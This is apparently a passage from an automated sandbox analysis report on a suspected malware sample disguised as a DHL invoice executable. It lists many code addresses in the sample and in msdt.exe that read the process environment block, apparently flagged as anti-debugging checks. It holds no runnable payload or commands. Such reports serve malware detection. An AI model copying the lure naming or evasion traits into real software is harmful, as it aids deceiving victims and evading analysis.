          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015214FB mov eax, dword ptr fs:[00000030h]3_2_015214FB
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]3_2_014E6CF0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]3_2_014E6CF0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]3_2_014E6CF0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147849B mov eax, dword ptr fs:[00000030h]3_2_0147849B
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147EF40 mov eax, dword ptr fs:[00000030h]3_2_0147EF40
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147FF60 mov eax, dword ptr fs:[00000030h]3_2_0147FF60
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538F6A mov eax, dword ptr fs:[00000030h]3_2_01538F6A
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]3_2_0149A70E
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]3_2_0149A70E
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]3_2_0153070D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]3_2_0153070D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148F716 mov eax, dword ptr fs:[00000030h]3_2_0148F716
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]3_2_014FFF10
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]3_2_014FFF10
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]3_2_01464F2E
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]3_2_01464F2E
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149E730 mov eax, dword ptr fs:[00000030h]3_2_0149E730
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A37F5 mov eax, dword ptr fs:[00000030h]3_2_014A37F5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478794 mov eax, dword ptr fs:[00000030h]3_2_01478794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]3_2_014E7794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]3_2_014E7794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]3_2_014E7794
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]3_2_01477E41
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]3_2_0152AE44
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]3_2_0152AE44
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147766D mov eax, dword ptr fs:[00000030h]3_2_0147766D
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]3_2_0148AE73
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]3_2_0148AE73
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]3_2_0148AE73
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]3_2_0148AE73
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]3_2_0148AE73
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]3_2_0146C600
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]3_2_0146C600
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]3_2_0146C600
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01498E00 mov eax, dword ptr fs:[00000030h]3_2_01498E00
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]3_2_0149A61C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]3_2_0149A61C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521608 mov eax, dword ptr fs:[00000030h]3_2_01521608
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146E620 mov eax, dword ptr fs:[00000030h]3_2_0146E620
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FE3F mov eax, dword ptr fs:[00000030h]3_2_0151FE3F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538ED6 mov eax, dword ptr fs:[00000030h]3_2_01538ED6
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014936CC mov eax, dword ptr fs:[00000030h]3_2_014936CC
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A8EC7 mov eax, dword ptr fs:[00000030h]3_2_014A8EC7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FEC0 mov eax, dword ptr fs:[00000030h]3_2_0151FEC0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014776E2 mov eax, dword ptr fs:[00000030h]3_2_014776E2
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014916E0 mov ecx, dword ptr fs:[00000030h]3_2_014916E0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFE87 mov eax, dword ptr fs:[00000030h]3_2_014FFE87
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E46A7 mov eax, dword ptr fs:[00000030h]3_2_014E46A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]3_2_01530EA5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]3_2_01530EA5
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]3_2_01530EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491849B mov eax, dword ptr fs:[00000030h]11_2_0491849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909080 mov eax, dword ptr fs:[00000030h]11_2_04909080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]11_2_04983884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]11_2_04983884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov ecx, dword ptr fs:[00000030h]11_2_0493F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]11_2_0493F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]11_2_0493F0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]11_2_049320A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049490AF mov eax, dword ptr fs:[00000030h]11_2_049490AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]11_2_0499B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8CD6 mov eax, dword ptr fs:[00000030h]11_2_049D8CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C14FB mov eax, dword ptr fs:[00000030h]11_2_049C14FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]11_2_04986CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]11_2_04986CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]11_2_04986CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049058EC mov eax, dword ptr fs:[00000030h]11_2_049058EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]11_2_049D4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]11_2_049D4015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]11_2_04987016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]11_2_04987016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]11_2_04987016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]11_2_049D740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]11_2_049D740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]11_2_049D740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]11_2_04986C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]11_2_04986C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]11_2_04986C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]11_2_04986C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]11_2_049C1C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]11_2_0491B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]11_2_0491B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]11_2_0491B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]11_2_0491B02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]11_2_0493002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]11_2_0493002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]11_2_0493002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]11_2_0493002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]11_2_0493002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493BC2C mov eax, dword ptr fs:[00000030h]11_2_0493BC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]11_2_04920050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]11_2_04920050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]11_2_0499C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]11_2_0499C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A44B mov eax, dword ptr fs:[00000030h]11_2_0493A44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1074 mov eax, dword ptr fs:[00000030h]11_2_049D1074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C2073 mov eax, dword ptr fs:[00000030h]11_2_049C2073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492746D mov eax, dword ptr fs:[00000030h]11_2_0492746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932990 mov eax, dword ptr fs:[00000030h]11_2_04932990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]11_2_0493FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]11_2_0493FD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C182 mov eax, dword ptr fs:[00000030h]11_2_0492C182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]11_2_04932581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A185 mov eax, dword ptr fs:[00000030h]11_2_0493A185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]11_2_04902D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]11_2_04902D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]11_2_04902D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]11_2_04902D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]11_2_04902D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]11_2_04931DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]11_2_04931DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]11_2_04931DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]11_2_049851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]11_2_049851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]11_2_049851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]11_2_049851BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]11_2_049D05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]11_2_049D05AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049335A1 mov eax, dword ptr fs:[00000030h]11_2_049335A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]11_2_049361A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]11_2_049361A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049869A6 mov eax, dword ptr fs:[00000030h]11_2_049869A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov ecx, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]11_2_04986DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049B8DF1 mov eax, dword ptr fs:[00000030h]11_2_049B8DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]11_2_0490B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]11_2_0490B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]11_2_0490B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049941E8 mov eax, dword ptr fs:[00000030h]11_2_049941E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]11_2_0491D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]11_2_0491D5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]11_2_049CFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]11_2_049CFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]11_2_049CFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]11_2_049CFDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]11_2_04909100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]11_2_04909100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]11_2_04909100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AD30 mov eax, dword ptr fs:[00000030h]11_2_0490AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]11_2_04913D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CE539 mov eax, dword ptr fs:[00000030h]11_2_049CE539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]11_2_04934D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]11_2_04934D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]11_2_04934D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8D34 mov eax, dword ptr fs:[00000030h]11_2_049D8D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]11_2_0493513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]11_2_0493513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0498A537 mov eax, dword ptr fs:[00000030h]11_2_0498A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov ecx, dword ptr fs:[00000030h]11_2_04924120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04927D50 mov eax, dword ptr fs:[00000030h]11_2_04927D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]11_2_0492B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]11_2_0492B944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04943D43 mov eax, dword ptr fs:[00000030h]11_2_04943D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983540 mov eax, dword ptr fs:[00000030h]11_2_04983540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]11_2_0490B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]11_2_0490B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]11_2_0492C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]11_2_0492C577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C962 mov eax, dword ptr fs:[00000030h]11_2_0490C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]11_2_0493D294
